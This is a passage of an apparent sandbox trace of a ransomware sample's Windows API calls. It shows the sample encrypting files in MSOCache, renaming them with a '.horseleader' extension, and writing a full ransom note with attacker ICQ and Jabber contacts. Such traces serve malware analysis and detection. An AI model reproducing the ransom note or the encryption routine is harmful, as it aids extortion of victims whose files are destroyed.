lpOverlapped=0x0) returned 1 [0195.753] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.753] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.754] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x17ae00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.754] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.757] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.757] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.757] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2f5c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.757] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.849] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.849] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0195.849] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.849] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0195.850] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0195.850] CloseHandle (hObject=0x21c) returned 1 [0195.850] GetProcessHeap () returned 0x780000 [0195.850] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.850] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.horseleader") returned 94 [0195.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.horseleader")) returned 1 [0195.851] GetProcessHeap () returned 0x780000 [0195.851] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.851] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0195.851] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Windows") returned -1 [0195.852] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0195.852] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".horseleader") returned 0x0 [0195.852] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0195.852] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="_uninstalling_.png") returned 1 [0195.852] lstrlenW (lpString=".testttjffg") returned 11 [0195.852] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".testttjffg") returned 0x0 [0195.852] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.852] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.852] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0195.853] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0195.853] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".txt") returned 0x0 [0195.853] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1231) returned 1 [0195.853] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x4cf, lpOverlapped=0x0) returned 1 [0195.855] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffb31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.855] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x4cf, lpOverlapped=0x0) returned 1 [0195.856] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.856] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0195.856] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0195.856] CloseHandle (hObject=0x21c) returned 1 [0195.857] GetProcessHeap () returned 0x780000 [0195.857] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.857] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.horseleader") returned 94 [0195.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.horseleader")) returned 1 [0195.858] GetProcessHeap () returned 0x780000 [0195.858] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.858] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0195.858] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0195.858] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0195.858] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0195.858] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0195.858] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0195.858] lstrlenW (lpString=".testttjffg") returned 11 [0195.858] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0195.858] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.859] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.859] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0195.859] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0195.859] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0195.859] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1852) returned 1 [0195.859] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x73c, lpOverlapped=0x0) returned 1 [0195.862] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0195.862] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x73c, lpOverlapped=0x0) returned 1 [0195.863] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.863] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0195.863] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0195.863] CloseHandle (hObject=0x21c) returned 1 [0195.863] GetProcessHeap () returned 0x780000 [0195.863] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0195.864] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0195.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0195.864] GetProcessHeap () returned 0x780000 [0195.865] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0195.865] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0195.865] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0195.865] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0195.865] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0195.865] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0195.866] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0195.867] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0195.867] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0195.867] CloseHandle (hObject=0x1cc) returned 1 [0195.867] GetProcessHeap () returned 0x780000 [0195.867] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0195.867] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0195.868] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0195.868] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned 66 [0195.868] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0195.868] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0195.868] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0195.868] GetProcessHeap () returned 0x780000 [0195.868] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0195.868] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*") returned 68 [0195.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0195.970] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0195.970] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.") returned 68 [0195.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0195.970] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0195.970] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0195.970] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0195.970] lstrlenW (lpString=".testttjffg") returned 11 [0195.970] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0195.970] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.970] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.971] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0195.971] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0195.971] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0195.971] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..") returned 69 [0195.971] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0195.971] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0195.971] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0195.971] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0195.971] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0195.971] lstrlenW (lpString=".testttjffg") returned 11 [0195.971] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0195.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.972] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0195.972] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0195.972] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0195.972] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0195.972] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0195.972] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0195.972] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0195.972] lstrlenW (lpString=".testttjffg") returned 11 [0195.972] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0195.972] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 